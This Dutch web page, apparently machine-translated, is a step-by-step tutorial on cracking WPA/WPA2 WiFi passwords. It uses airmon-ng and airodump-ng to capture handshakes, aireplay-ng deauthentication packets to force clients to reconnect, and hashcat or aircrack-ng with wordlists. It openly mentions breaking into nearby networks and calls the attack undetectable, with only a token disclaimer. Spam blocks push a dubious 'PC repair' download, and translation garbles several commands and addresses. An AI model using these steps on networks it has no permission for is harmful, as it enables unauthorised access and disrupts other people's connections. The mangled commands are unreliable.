Hoe WPAWPA2 WiFi-wachtwoorden te kraken via Hashcat u0026 amp; Aircrack-ng

Bijgewerkt Januari 2023: Krijg geen foutmeldingen meer en vertraag je systeem met onze optimalisatietool. Haal het nu op - > deze link

  1. Download en installeer de reparatietool hier.
  2. Laat het uw computer scannen.
  3. De tool zal dan repareer je computer.

In deze gids gaan we u helpen hoe u WiFi-netwerken kunt kraken met behulp van twee van de beste draadloze hacktools die zijn beveiligd met een zwak wachtwoord. We zullen stap voor stap uitleggen hoe je WPA2 kunt hacken met aircrack-ng en hashcat, hoewel het niet uitputtend is. Dit zal voldoende informatie zijn voor de gebruikers om hun netwerkbeveiliging te testen of in te breken in een nabije omgeving.

De aanval die hieronder wordt beschreven, is volledig passief en kan niet worden gedetecteerd op voorwaarde dat het wachtwoord dat is gebarsten zal niet door jou worden gebruikt. Om het verkenningsproces te versnellen en een optionele de-authenticatie-aanval kan worden gebruikt, plus kunt u er meer over weten tot het einde van de handleiding.

Als u op de een of andere manier een beetje kennis hebt van dit proces, dan kunt u hoeven de beschrijvingen niet te kennen, spring gewoon naar de lijst met commando's die onderaan zijn gebruikt.

Belangrijke opmerkingen:

U kunt nu pc-problemen voorkomen door dit hulpmiddel te gebruiken, zoals bescherming tegen bestandsverlies en malware. Bovendien is het een geweldige manier om uw computer te optimaliseren voor maximale prestaties. Het programma herstelt veelvoorkomende fouten die kunnen optreden op Windows-systemen met gemak - geen noodzaak voor uren van troubleshooting wanneer u de perfecte oplossing binnen handbereik hebt:

  • Stap 1: Downloaden PC Reparatie & Optimalisatie Tool (Windows 11, 10, 8, 7, XP, Vista - Microsoft Gold Certified).
  • Stap 2: Klik op "Start Scan" om problemen in het Windows register op te sporen die PC problemen zouden kunnen veroorzaken.
  • Stap 3: Klik op "Repair All" om alle problemen op te lossen.

hier

Opmerking: Houd één ding in gedachten dat deze tutorial slechts voor educatieve doeleinden en mag niet worden gebruikt voor enige illegale activiteit en de auteur is niet verantwoordelijk voor enig gebruik.

De benodigde tools

  • Zorg ervoor dat u vertrouwd bent met het gebruik van de Linux-opdrachtregel.
  • Zorg ervoor dat Kali Linux of Kali NetHunter is geïnstalleerd.
  • Zorg er nu voor dat Aircrack-ng is gedownload en geïnstalleerd.
  • De laatste tool die je nodig hebt, is hashcat.
  • John The Ripper is een geweldig alternatief als hashcat niet meer voor je werkt.

Hoe WPA2-wachtwoorden te kraken met Aircrack-ng a nd Hashcat (Tutorial)

Schakel de monitormodus in uw WiFi-adapter in

U moet beginnen met het opsommen van de draadloze interacties die de monitormodus ondersteunen with:

Airmon-ng

Als er geen interface wordt vermeld, dan het betekent dat uw draadloze kaart de monitormodus niet ondersteunt. We kunnen aannemen dat de naam van de draadloze interface [email protected] is, gebruik de juiste naam als deze hiervan afwijkt, dan gaan we de interface in de monitormodus plaatsen:

Airmon-ng start [email protected]

Hierna moet je iwconfig draaien. U zult nu een nieuwe monitormodus kunnen zien zoals m [e-mail beschermd] of [e-mail beveiligd] .

Vind uw target

U moet beginnen te luisteren naar de 802.11 Beacon-frames die worden uitgezonden door de bijna draadloze routers door uw monitorinterface te gebruiken:

Airodump-ng [email protected]

Je zult de volgende output zien:

CH 13] [Elapsed: 52 s] [2021 ? 3 ? 7 16:50

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

14:91 : 82: F7: 52: EB-66 205 26 0 1 54e OPN belkin.2e8.guests

14: 91: 82: F7: 52: E8-64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8

14:22: DB: 1A: DB: 64-81 44 7 0 1 54 WPA2 CCMP \u0026 lt; length: 0 \u0026 gt;

14:22: DB: 1A: DB: 66-83 48 0 0 1 54e. WPA2 CCMP PSK heeft u beveiligd

9C: 5C: 8E: C9: AB: C0-81 19 0 0 3 54e WPA2 CCMP PSK heeft u beveiligd

00: 23: 69: AD: AF: 94-82 350 4 0 1 54e WPA2 CCMP PSK SecuredYou is de beste

06: 26: BB: 75 : ED: 69-84 232 0 0 1 54e. WPA2 CCMP PSK HH2

78: 71: 9C: 99: 67: D0-82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2

9C: 34: 26: 9F: 2E: E8-85 40 0 ​​0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT

BC: EE: 7B: 8F: 48: 28-85 119 10 0 1 54e WPA2 CCMP PSK-root

EC: 1A: 59: 36: AD: CA-86210 28 0 1 54e WPA2 CCMP PSK belkin.dca

Nu gaan we het wachtwoord kraken van een netwerk met de naam secureyou. Je moet het BSSID MAC-adres onthouden, evenals het kanaalnummer (CH) zoals het wordt weergegeven door Airodump-ng, aangezien we ze allebei nodig hebben voor de volgende stap.

LEZEN :  Hoe u Aero voor Windows 10 in 2021-4-werkmethoden kunt inschakelen

Hoe een 4-way handshake in wifi-netwerken

De WPA of WPA2 gebruikt een 4-way handshake om apparaten bij het netwerk te authenticeren. U hoeft niet te weten wat het betekent, maar u moet een van deze handdrukken vastleggen om het netwerkwachtwoord te kraken. Handdrukken vinden plaats wanneer een apparaat verbinding maakt met het netwerk, zoals wanneer uw buren thuiskomen, we kunnen deze handdruk vastleggen door airmon-ng te sturen om het verkeer op het doel te volgen door het kanaal te gebruiken, evenals de bssid-waarden die afkomstig zijn van het laatste commando.

  • vervang-c en ? bssid waarden door de waarden van uw doelnetwerk
  • -w specificeert de map waar we de pakketopname zullen opslaan
  • airodump-ng-c 3 ? bssid 9C: 5C: 8E: C9: AB: C0-w. mon0
  • CH 6] [Verstreken: 1 min] [2020 ? 3 ? 13:09:16]
  • BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  • 9C: 5C: 8E: C9: AB: C0-47 0140 0 0 6 54e WPA2 CCMP PSK DELL

Als je eenmaal de handshake hebt vastgelegd, moet je zoiets als {WPA handshake: bc: d3: c9: ef: d2: 67 zien rechts bovenaan het scherm, precies rechts van de huidige tijd.

Als u zich ongeduldig voelt en vertrouwd bent met het gebruik van de actieve aanval, dan kunt u de apparaten dwingen verbinding te maken met het doelnetwerk om opnieuw verbinding te maken door kwaadaardige de-authenticatiepakketten naar hen te sturen. Dit resulteert in het vangen van een 4-way handshake.

Zodra de handshake is vastgelegd, moet je op ctrl-c drukken om airodump-ng te verlaten. Je zult een .cap-bestand zien waarin je airodump-ng hebt verteld om de opname op te slaan met de naam-01.Cap. We gaan dit opnamebestand gebruiken om het netwerkwachtwoord te kraken. We gaan dit bestand hernoemen om de netwerknaam weer te geven die we proberen te kraken:

Mv ./-01.cap beveiligd u .cap

Het echte plezier: de WPA2-pin kraken

De laatste stap is om het wachtwoord te kraken met de gevangen handdruk. Als je toegang hebt tot een GPU, wordt het ten zeerste aanbevolen om de hashcat te gebruiken voor het kraken van wachtwoorden. We hebben een tool gemaakt die de hashcat erg gemakkelijk te gebruiken maakt, bekend als de naïeve-hashcat.

Als je geen toegang hebt tot de GPU, kun je veel GPU-kraakservices vinden die kunnen worden gebruikt, zoals de GPUHASH.me of OnlineHashCrack. Je kunt ook CPU-cracking gebruiken met de Aircrack-ng. Als u echter tijd wilt besparen en het grootste deel van uw GPU wilt gebruiken, moet u uw GPU overklokken om de brute-forcing te versnellen.

LEZEN :  Python 3.8 installeren in Ubuntu 18.04, 19.04, 19.10, 20.04 (2021)

Houd er rekening mee dat beide manieren hieronder uitgaan van een goed, door de gebruiker gegenereerd wachtwoord . Veel van de WPA-of WPA2-routers worden geleverd met een reeks willekeurige wachtwoorden van 12 tekens die de meeste gebruikers ongewijzigd laten. We raden je aan om de woordenboekbestanden met waarschijnlijke WPA-lengte te gebruiken als je een van deze wachtwoorden wilt kraken.

Naive-Hashcat gebruiken om de magie te doen

Voordat je het wachtwoord kraken met de naïeve-hashcat, moet je het .cap-bestand converteren naar het equivalente hashcat-bestandsformaat .hccapx. Dit kan heel snel worden gedaan door ofwel het .cap-bestand te uploaden naar https://hashcat.net/cap2hccapx of door rechtstreeks de cap2hccapx-tool te gebruiken.

Dan moet je het downloaden en uitvoeren in hashcat:

# downloadgit clone https://github.com/brannondorsey/naive-hashcat

cd naive-hashcat

Download een woordenlijst of groot woordenboekbestand:

Wachtwoorden Woordenlijst voor het kraken van WPA2 WiFi-wachtwoorden

Hashcat-modus voor WPA/WPA2 die u moet instellen:

2500 is de hashcat-hash-modus voor WPA/WPA2

HASH_FILE = secureyou.hccapx POT_FILE = secureyou.pot HASH_TYPE = 2500 ./naive-hashcat .sh

De naïeve-hashcat gebruikt verschillende aanvallen zoals regel, combinatie, masker en woordenboek en het kan bijna 10 dagen duren voordat de wachtwoorden met gemiddelde sterkte worden uitgevoerd. Het gekraakte wachtwoord wordt opgeslagen in hackme.pot, dus u moet dit bestand regelmatig controleren. Zodra het wachtwoord is gekraakt, ziet u zoiets als de inhoud van uw POT_FILE:

e30a5a57fc00211fc9f57a4491508cc3: 9c5c8ec9abc0: acd1b8dfd971: ASUS: secureyouhacking

De laatste twee bestanden die zijn gescheiden door: is respectievelijk de naam van het netwerk en het wachtwoord.

Aircrack-ng gebruiken om een ​​woordenboekaanval uit te voeren

De aircrack-ng kan ook worden gebruikt voor woordenboekaanvallen die standaard zijn en op uw CPU worden uitgevoerd. Voordat u de overtreding begaat, heeft u een woordenlijst nodig. We raden u aan het beruchte woordenboekbestand rockyou te gebruiken.

RockYou Dictionary-woordenlijstbestand downloaden

Houd er rekening mee dat als het netwerkwachtwoord niet is in de woordenlijst, dan mag je het wachtwoord niet kraken.

  • #-a2 specificeert WPA2,-b is de BSSID,-w is het woordbestand
  • aircrack-ng-a2-b 9C: 5C: 8E: C9: AB: C0-w rockyou.txt hackme.cap

U zult zie een KEY FOUND-bericht in de terminal dat wordt gevolgd door een tekstversie van het netwerkwachtwoord als het wachtwoord gekraakt is.

  • Aircrack-ng 2.0
  • [00:01:49] 111040 sleutels getest (102,73 k/s)
  • SLEUTEL GEVONDEN! [SecuredYou-test-environment]
  • Master Key: A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
  • 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
  • Transient Sleutel: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
  • 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
  • 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
  • 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
  • EAPOL HMAC: 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

De De-authentication Attack

De de-authentication-aanval kan vervalste de-authentication-pakketten van uw machine naar de client sturen die met het netwerk is verbonden en die u probeert te kraken. De pakketten bevatten valse afzenderadressen die voor de klant verschijnen alsof ze vanaf het toegangspunt zelf zijn verzonden. Bij ontvangst van pakketten zoals deze zullen veel clients de verbinding met het netwerk verbreken en dan onmiddellijk opnieuw verbinding maken, voorzien van een 4-way handshake als u luistert met airodump-ng.

LEZEN :  PS5-prestaties verbeteren | Optimaliseer mijn PS5

U kunt airodump-ng gebruiken om te monitoren een specifiek toegangspunt (met behulp van –c kanaal –bssid MAC) tenzij en totdat u ziet dat er een client (STATION) is aangesloten. Een verbonden client ziet er bijna zo uit, waarbij 64: BC: 0C: 48: 97: F7 de client-MAC is.

  • CH 7] [Verstreken: 4 minuten] [2020 ? 3-08 20:24]
  • BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  • 9C: 5C: 8E: C9: AB: C0-19 75 1043144 10 6 54e WPA2 CCMP PSK ASUS
  • BSSID STATION PWR Rate Lost Frames Prob
  • 9C: 5C: 8E: C9: AB : C0 64: BC: 0C: 48: 97: F7-37 1e-1e 4 6479 Dell

Nu moet je airodump-ng laten draaien en open een nieuwe terminal. We gaan een airplay-ng-commando gebruiken om nep-de-auth-pakketten naar de slachtofferclient te sturen, die hem dwingt om opnieuw verbinding te maken met het netwerk en hopelijk een handdruk te pakken.

  • -0 3 specificeert dat we 3 mooie pakketten willen verzenden. Verhoog dit aantal
  • indien nodig met het risico de netwerkactiviteit van de client merkbaar te onderbreken
  • -a is de MAC van het toegangspunt
  • -c is de MAC van de client
  • aireplay-ng-0 2-a 9C: 5C: 8E: C9: AB: X0-c 64: DC: 3C: 48: 97: F7 mon0

Je kunt ook deauth-pakketten uitzenden naar alle verbonden clients in een draadloos netwerk met behulp van het onderstaande commando:

  • aireplay-ng-0 2-a 9C: 5C: 8E: C9: AB: C0 mon0

Zodra je de automatische pakketten verstuurt , je moet teruggaan naar het airodump-ng-proces en als je geluk hebt, zul je zoiets rechtsboven kunnen zien [WPA handshake: 9C: 6C: 9E: D7: 8G: C0. Nu de handdruk is vastgelegd, bent u klaar om het netwerkwachtwoord te kraken.

Videoversie van de tutorial

Als u iemand bent die leert door te kijken naar iemand anders die het doet, is hieronder een videoversie voor jou.

Hacken van draadloze WPA2-wachtwoorden met Aircrack-ng/Hashcat

Alternatieve draadloze hacktools die u zou kunnen gebruiken:

  • Kismet gratis download-WiFi Sniffer
  • Reaver WPS Pin Cracker downloaden
  • 15 Beste gratis hacktools en beveiligingstools om te downloaden.

Laatste woorden

Disclaimer: dit is slechts een simulatie van hoe iemand WPA2-wachtwoorden kan kraken met tools als Hashcat en Aircrack-ng. Dit soort activiteit mag alleen worden uitgevoerd in een gecontroleerde omgeving waar toestemming is gegeven. Ik hoop echter dat je deze uitgebreide tutorial leuk vond en er het beste uit hebt gehaald.

adminguides

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *